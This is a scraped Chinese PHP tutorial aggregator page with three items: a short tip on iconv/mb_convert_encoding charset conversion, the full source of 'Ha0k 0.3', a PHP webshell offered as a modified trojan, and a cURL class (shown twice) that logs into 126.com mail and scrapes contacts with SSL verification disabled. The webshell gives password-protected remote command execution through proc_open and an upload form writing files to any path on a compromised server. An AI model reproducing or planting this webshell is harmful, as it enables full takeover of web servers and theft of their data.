iconv( "UTF-8", "gb2312//IGNORE" , $FormValues['a'])
ignore的意思是忽略转换时的错误,发现iconv在转换字符"—"到gb2312时会出错,如果没有ignore参数,所有该字符后面的字符串都无法被保存。
另外mb_convert_encoding没有这个bug,所以最好的写法是:
mb_convert_encoding($FormValues['a'], "gb2312", "UTF-8");
但是需要先enable mbstring 扩展库。
也可以把mysql数据库的collation设成utf-8就不用作转换了
当前位置: 编程技术>php
本页文章导读:
▪PHP iconv 函数转gb2312的bug解决方法
iconv( "UTF-8", "gb2312//IGNORE" , $FormValues['a']) ignore的意思是忽略转换时的错误,发现iconv在转换字符"—"到gb2312时会出错,如果没有ignore参数,所有该字符后面的字符串都无法被保存。 另外mb_conve.........
▪Ha0k 0.3 PHP 网页木马修改版
代码如下:<?php //此处可设置多个用户 $passwd = array('ha0k' => 'ha0k', 'hackerdsb'=>'hackerdsb'); /* 此处设置命令的别名 */ $aliases = array('ls' => 'ipconfig', 'll' => 'ls -lvhF'); if (!isset($_SERVER['PHP_AUTH_US.........
▪PHP获取163、gmail、126等邮箱联系人地址【已测试2009.10.10】
在网上找了一些,大部分都已经失效,为此我重新整理了一下;特别放出126的代码,163是比较容易抓取的;126有点变态多了一次跳转,比较麻烦 代码如下:<?php /** * @file class.126http.php * 获.........
[1]PHP iconv 函数转gb2312的bug解决方法
来源: 互联网 发布时间: 2013-11-30
[2]Ha0k 0.3 PHP 网页木马修改版
来源: 互联网 发布时间: 2013-11-30
代码如下:
<?php
//此处可设置多个用户
$passwd = array('ha0k' => 'ha0k',
'hackerdsb'=>'hackerdsb');
/* 此处设置命令的别名 */
$aliases = array('ls' => 'ipconfig',
'll' => 'ls -lvhF');
if (!isset($_SERVER['PHP_AUTH_USER'])||!isset($_SERVER['PHP_AUTH_PW'])||
!isset($passwd[$_SERVER['PHP_AUTH_USER']]) ||
$passwd[$_SERVER['PHP_AUTH_USER']] != $_SERVER['PHP_AUTH_PW']) {
header('WWW-Authenticate: Basic realm="by Ha0k"');
header('HTTP/1.0 401 Unauthorized');
$authenticated = false;
}
else {
$authenticated = true;
/* 开始session */
session_start();
/* 初始化session. */
if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
$_SESSION['cwd'] = getcwd(); //取当前目录
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($_REQUEST['command'])) {
if (get_magic_quotes_gpc()) { //0表关闭,1表开启,开启时过滤
/* We don't want to add the commands to the history in the
* escaped form, so we remove the backslashes now. */
$_REQUEST['command'] = stripslashes($_REQUEST['command']); //将用addslashes()函数处理后的字符串返回原样
}
/* history */
if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) //查找保存数组中的值
unset($_SESSION['history'][$i]); //销毁
array_unshift($_SESSION['history'], $_REQUEST['command']);//array_unshift()函数的作用是在一个数组中插入新的元素。而这个新的数组将被添加到原数组的开头部分。函数最终返回的是插入新元素后的数组。
/* 输出Ha0k# command */
$_SESSION['output'] .= 'Ha0k# ' . $_REQUEST['command'] . "\n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
$_SESSION['cwd'] = dirname(__FILE__); //获取当前所在目录
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1][0] == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) { //改变当前目录
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} else {
/* The command is not a 'cd' command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']); //改变目录
/* 别名扩展 */
$length = strcspn($_REQUEST['command'], " \t"); //查找\t字符串,返回位置
$token = substr($_REQUEST['command'], 0, $length); //取字符串0-\t
if (isset($aliases[$token]))
$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
$p = proc_open($_REQUEST['command'], //执行脚本
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* 读出发送 */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]), //转换特殊字符为HTML字符编码
ENT_COMPAT, 'GB2312');
}
/* 读出 */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'GB2312');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);//关闭管道
}
}
/* 构建在JavaScript使用命令历史记录 */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';//将数组搞成字符串
}
}
header('Content-Type: text/html; charset=GB2312');
echo '<?xml version="1.0" encoding="GB2312"?>' . "\n";
?>
<?php
if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
//echo "上传文件成功: " . $HTTP_POST_FILES['userfile']['name'];
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Ha0k webshell</title>
<script type="text/javascript" language="JavaScript">
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
</script>
<style type="text/css">
<!--
.STYLE1 {
color: #33FF33;
font-weight: bold;
}
a:link {
text-decoration: none;
}
a:visited {
text-decoration: none;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
-->
</style>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /></head>
<body onload="init()">
<BODY BGCOLOR="#$$$$$$">
<BODY TEXT="1afa3a">
<h1><a href="http://hi.baidu.com/hackerdsb" >HA0K</a></h1>
<h6>WE JUST FOR JUSTICE,FIGHT FOR EVIAL</h6></FONT>
<?php if (!$authenticated) { ?>
<p>You failed to authenticate yourself to PhpShell. You can <a
href="/blog_article/</php echo $_SERVER[.html'PHP_SELF'] ?>">reload</a> to try again.</p>
<p>Try reading the <a href="/blog_article/INSTALL/index.html">INSTALL</a> file if you're having
problems with installing PhpShell.</p>
</body>
</html>
<?php //
exit;
}
error_reporting (E_ALL);
if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10;
?>
<p>当前目录为: <code><?php echo $_SESSION['cwd'] ?></code></p>
<form name="shell" action="/blog_article/</php echo $_SERVER[.html'PHP_SELF'] ?>" method="post">
<div>
<textarea name="output" readonly="readonly" cols="80" rows="<?php echo $_REQUEST['rows'] ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
<</textarea>
</div><br>
<p >
$ <input name="command" type="text"
onkeyup="key(event)" size="78" tabindex="1">
</p>
<p>
<input type="submit" value="执行" />
<input type="submit" name="reset" value="恢复" />
行数: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
</p>
</form>
<form enctype="multipart/form-data" action="" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000">
<p>本地文件名: <input name="userfile" type="file">
<p>远程文件名: <input name="remotefile" type="text">
<input type="submit" value="发送">
</form>
</body>
</html>
Mcafee(麦咖啡杀毒软件) 防止网页被挂马的设置教程(最后不要在服务器端打开) 我们强烈推荐服务器安装mcafee 8.5i的版本
全世界最小的php网页木马一枚 附PHP木马的防范方法
[3]PHP获取163、gmail、126等邮箱联系人地址【已测试2009.10.10】
来源: 互联网 发布时间: 2013-11-30
在网上找了一些,大部分都已经失效,为此我重新整理了一下;特别放出126的代码,163是比较容易抓取的;126有点变态多了一次跳转,比较麻烦
<?php
/**
* @file class.126http.php
* 获得126邮箱通讯录列表
* @author jvones<jvones@gmail.com> http://www.jvones.com/blog
* @date 2009-09-26
**/
class http126
{
private function login($username, $password)
{
//第一步:初步登陆
$cookies = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, "https://reg.163.com/logins.jsp?type=1&product=mail126&url=http://entry.mail.126.com/cgi/ntesdoor?hid%3D10010102%26lightweight%3D1%26verifycookie%3D1%26language%3D0%26style%3D-1");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$username."@126.com&password=".$password);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$str = curl_exec($ch);
//file_put_contents('./126result.txt', $str);
curl_close($ch);
//获取redirect_url跳转地址,可以从126result.txt中查看,通过正则在$str返回流中匹配该地址
preg_match("/replace\(\"(.*?)\"\)\;/", $str, $mtitle);
$_url1 = $mtitle[1];
//file_put_contents('./126resulturl.txt', $redirect_url);
//第二步:再次跳转到到上面$_url1
$ch = curl_init($_url1);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_COOKIEFILE,COOKIEJAR);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR);
curl_setopt($ch,CURLOPT_HEADER,1);
$str2 = curl_exec($ch);
curl_close($ch);
if (strpos($contents, "安全退出") !== false)
{
return 0;
}
return 1;
}
/**
* 获取邮箱通讯录-地址
* @param $user
* @param $password
* @param $result
* @return array
*/
public function getAddressList($username, $password)
{
if (!$this->login($username, $password))
{
return 0;
}
$header = $this->_getheader($username);
if (!$header['sid'])
{
return 0;
}
//测试找出sid(很重要)和host
//file_put_contents('./host.txt', $header['host']);
//file_put_contents('./sid.txt', $header['sid']);
//开始进入模拟抓取
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$header['host']."/a/s?sid=".$header['sid']."&func=global:sequential");
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIEJAR);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/xml"));
$str = "<?xml version=\"1.0\"?><object><array name=\"items\"><object><string name=\"func\">pab:searchContacts</string><object name=\"var\"><array name=\"order\"><object><string name=\"field\">FN</string><boolean name=\"ignoreCase\">true</boolean></object></array></object></object><object><string name=\"func\">user:getSignatures</string></object><object><string name=\"func\">pab:getAllGroups</string></object></array></object>";
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $str);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
ob_start();
curl_exec($ch);
$contents = ob_get_contents();
ob_end_clean();
curl_close($ch);
//get mail list from the page information username && emailaddress
preg_match_all("/<string\s*name=\"EMAIL;PREF\">(.*)<\/string>/Umsi",$contents,$mails);
preg_match_all("/<string\s*name=\"FN\">(.*)<\/string>/Umsi",$contents,$names);
$users = array();
foreach($names[1] as $k=>$user)
{
//$user = iconv($user,'utf-8','gb2312');
$users[$mails[1][$k]] = $user;
}
if (!$users)
{
return '您的邮箱中尚未有联系人';
}
return $users;
}
/**
* Get Header info
*/
private function _getheader($username)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://entry.mail.126.com/cgi/ntesdoor?hid=10010102&lightweight=1&verifycookie=1&language=0&.$username."@126.com");
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIEJAR); //当前使用的cookie
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR); //服务器返回的新cookie
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, true);
$content=curl_exec($ch);
preg_match_all('/Location:\s*(.*?)\r\n/i',$content,$regs);
$refer = $regs[1][0];
preg_match_all('/http\:\/\/(.*?)\//i',$refer,$regs);
$host = $regs[1][0];
preg_match_all("/sid=(.*)/i",$refer,$regs);
$sid = $regs[1][0];
curl_close($ch);
return array('sid'=>$sid,'refer'=>$refer,'host'=>$host);
}
}
?>
代码如下:
<?php
/**
* @file class.126http.php
* 获得126邮箱通讯录列表
* @author jvones<jvones@gmail.com> http://www.jvones.com/blog
* @date 2009-09-26
**/
class http126
{
private function login($username, $password)
{
//第一步:初步登陆
$cookies = array();
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, "https://reg.163.com/logins.jsp?type=1&product=mail126&url=http://entry.mail.126.com/cgi/ntesdoor?hid%3D10010102%26lightweight%3D1%26verifycookie%3D1%26language%3D0%26style%3D-1");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$username."@126.com&password=".$password);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$str = curl_exec($ch);
//file_put_contents('./126result.txt', $str);
curl_close($ch);
//获取redirect_url跳转地址,可以从126result.txt中查看,通过正则在$str返回流中匹配该地址
preg_match("/replace\(\"(.*?)\"\)\;/", $str, $mtitle);
$_url1 = $mtitle[1];
//file_put_contents('./126resulturl.txt', $redirect_url);
//第二步:再次跳转到到上面$_url1
$ch = curl_init($_url1);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_COOKIEFILE,COOKIEJAR);
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR);
curl_setopt($ch,CURLOPT_HEADER,1);
$str2 = curl_exec($ch);
curl_close($ch);
if (strpos($contents, "安全退出") !== false)
{
return 0;
}
return 1;
}
/**
* 获取邮箱通讯录-地址
* @param $user
* @param $password
* @param $result
* @return array
*/
public function getAddressList($username, $password)
{
if (!$this->login($username, $password))
{
return 0;
}
$header = $this->_getheader($username);
if (!$header['sid'])
{
return 0;
}
//测试找出sid(很重要)和host
//file_put_contents('./host.txt', $header['host']);
//file_put_contents('./sid.txt', $header['sid']);
//开始进入模拟抓取
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$header['host']."/a/s?sid=".$header['sid']."&func=global:sequential");
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIEJAR);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/xml"));
$str = "<?xml version=\"1.0\"?><object><array name=\"items\"><object><string name=\"func\">pab:searchContacts</string><object name=\"var\"><array name=\"order\"><object><string name=\"field\">FN</string><boolean name=\"ignoreCase\">true</boolean></object></array></object></object><object><string name=\"func\">user:getSignatures</string></object><object><string name=\"func\">pab:getAllGroups</string></object></array></object>";
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $str);
curl_setopt($ch, CURLOPT_TIMEOUT, TIMEOUT);
ob_start();
curl_exec($ch);
$contents = ob_get_contents();
ob_end_clean();
curl_close($ch);
//get mail list from the page information username && emailaddress
preg_match_all("/<string\s*name=\"EMAIL;PREF\">(.*)<\/string>/Umsi",$contents,$mails);
preg_match_all("/<string\s*name=\"FN\">(.*)<\/string>/Umsi",$contents,$names);
$users = array();
foreach($names[1] as $k=>$user)
{
//$user = iconv($user,'utf-8','gb2312');
$users[$mails[1][$k]] = $user;
}
if (!$users)
{
return '您的邮箱中尚未有联系人';
}
return $users;
}
/**
* Get Header info
*/
private function _getheader($username)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://entry.mail.126.com/cgi/ntesdoor?hid=10010102&lightweight=1&verifycookie=1&language=0&.$username."@126.com");
curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIEJAR); //当前使用的cookie
curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIEJAR); //服务器返回的新cookie
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_NOBODY, true);
$content=curl_exec($ch);
preg_match_all('/Location:\s*(.*?)\r\n/i',$content,$regs);
$refer = $regs[1][0];
preg_match_all('/http\:\/\/(.*?)\//i',$refer,$regs);
$host = $regs[1][0];
preg_match_all("/sid=(.*)/i",$refer,$regs);
$sid = $regs[1][0];
curl_close($ch);
return array('sid'=>$sid,'refer'=>$refer,'host'=>$host);
}
}
?>
最新技术文章: